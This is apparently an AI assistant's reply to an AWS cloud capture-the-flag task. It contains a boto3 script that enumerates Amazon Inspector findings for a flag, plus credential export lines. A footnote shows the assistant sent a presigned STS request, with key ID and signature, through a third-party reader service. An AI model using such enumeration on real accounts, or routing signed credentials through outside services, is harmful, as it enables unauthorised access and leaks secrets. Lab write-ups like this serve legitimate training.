for pharma supply-chain provider question 
-------------------------------------------
I couldn’t truthfully recover the flag from this sandbox.

What I **did verify**: the credentials are valid and resolve to IAM user `arn:aws:iam::276278912943:user/inspector-ro` in account `276278912943`. Other services I probed, including IAM and S3, are blocked by a permissions boundary, not by invalid credentials. ([Jina AI][1])

The intended path is very likely **Amazon Inspector v2**: the user is named `inspector-ro`, and Inspector’s `ListFindings`, `BatchGetCodeSnippet`, and `BatchGetFindingDetails` APIs expose findings/code snippets that fit the “TODO / build system / ledger” clue. Those APIs are signed **POST** endpoints, for example `BatchGetCodeSnippet` is `POST /codesnippet/batchget`, and this environment only let me issue GET requests to AWS. ([AWS Documentation][2])

Run this locally with the provided CTF creds; it should print any flag found in Inspector findings/details/snippets:

```python
import os, re, json, boto3

REGION = "us-east-1"
FLAG_RE = re.compile(r'(?i)(?:flag|ctf|northchain|pwnedlabs)\{[^}]+\}')

session = boto3.Session(region_name=REGION)
inspector = session.client("inspector2")

def find_flags(obj):
    text = json.dumps(obj, default=str)
    return sorted(set(FLAG_RE.findall(text)))

def chunks(items, n):
    for i in range(0, len(items), n):
        yield items[i:i+n]

all_findings = []
next_token = None

while True:
    kwargs = {"maxResults": 100}
    if next_token:
        kwargs["nextToken"] = next_token

    page = inspector.list_findings(**kwargs)
    all_findings.extend(page.get("findings", []))

    flags = find_flags(page)
    for flag in flags:
        print(flag)

    next_token = page.get("nextToken")
    if not next_token:
        break

arns = [f["findingArn"] for f in all_findings if "findingArn" in f]

for batch in chunks(arns, 10):
    for call in (
        inspector.batch_get_finding_details,
        inspector.batch_get_code_snippet,
    ):
        try:
            resp = call(findingArns=batch)
            for flag in find_flags(resp):
                print(flag)
        except Exception as e:
            print(f"{call.__name__} failed: {e}")
```

Set the creds first:

```bash
export AWS_ACCESS_KEY_ID='AKIAUAU4BU6X3RQ3FBP2'
export AWS_SECRET_ACCESS_KEY='<the secret from the prompt>'
export AWS_DEFAULT_REGION='us-east-1'
python3 solve.py
```

[1]: https://r.jina.ai/https%3A//sts.us-east-1.amazonaws.com/?Action=GetCallerIdentity&Version=2011-06-15&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAUAU4BU6X3RQ3FBP2%2F20260427%2Fus-east-1%2Fsts%2Faws4_request&X-Amz-Date=20260427T192206Z&X-Amz-Expires=300&X-Amz-Signature=d0cfa9e99fa360c3e3f707697191d81623059fc9d08376d80f9122f64d34bbc0&X-Amz-SignedHeaders=host "https://r.jina.ai/https%3A//sts.us-east-1.amazonaws.com/?Action=GetCallerIdentity&Version=2011-06-15&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAUAU4BU6X3RQ3FBP2%2F20260427%2Fus-east-1%2Fsts%2Faws4_request&X-Amz-Date=20260427T192206Z&X-Amz-Expires=300&X-Amz-Signature=d0cfa9e99fa360c3e3f707697191d81623059fc9d08376d80f9122f64d34bbc0&X-Amz-SignedHeaders=host"
[2]: https://docs.aws.amazon.com/inspector/v2/APIReference/API_ListFindings.html "ListFindings - Inspector"
